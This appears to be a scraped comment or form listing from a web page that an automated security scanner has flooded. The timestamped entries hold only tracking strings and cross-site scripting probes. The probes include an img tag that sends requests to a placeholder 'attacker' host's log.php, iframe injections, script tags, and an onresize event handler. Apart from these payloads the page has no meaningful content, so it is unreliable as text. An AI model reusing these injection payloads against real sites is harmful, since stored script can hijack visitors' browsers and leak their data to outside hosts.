  2021-05-06 08:12:57


  1


 • pHqghUme

  2021-05-06 08:12:16


  1


 • pHqghUme

  2021-05-06 08:11:56


  1


 • pHqghUme

  2021-05-06 08:11:43


  1CtoN7PPReO


 • 1Di9oaYGrEO

  2021-05-06 08:11:42


  1


 • pHqghUme

  2021-05-06 08:11:41


  1


 • pHqghUme

  2021-05-06 08:11:41


  1


 • pHqghUme

  2021-05-06 08:03:56


  1


 • pHqghUme

  2021-05-06 05:39:24


  1<PQR5Yz<


 • pHqghUme<Icd7L9<

  2021-05-06 05:39:19


  1


 • pHqghUme

  2021-05-06 05:39:10


  1<img sRc='http://attacker-9899/log.php?


 • pHqghUme<img sRc='http://attacker-9593/log.php?

  2021-05-06 05:39:02


  1


 • pHqghUme

  2021-05-06 05:38:59


  1<FNwjRR x=9347>


 • pHqghUme

  2021-05-06 05:38:49


  1<ifRAme sRc=9302.com></IfRamE>


 • pHqghUme<v6qvj5 x=9766>

  2021-05-06 05:38:40


  1


 • pHqghUme

  2021-05-06 05:38:37


  1<WTX6QO>QCS7S[!+!]</WTX6QO>


 • pHqghUme<ifRAme sRc=9053.com></IfRamE>

  2021-05-06 05:38:29


  1


 • pHqghUme

  2021-05-06 05:38:28


  1PNZz8 <ScRiPt >MQfB(9595)</ScRiPt>


 • pHqghUme

  2021-05-06 05:38:15


  1<% contenteditable onresize=MQfB(9289)>


 • pHqghUme<WROF4D>QT1DA[!+!]</WROF4D>

  2021-05-06 05:38:15


  1


 • pHqghUme

  2021-05-06 05:38:07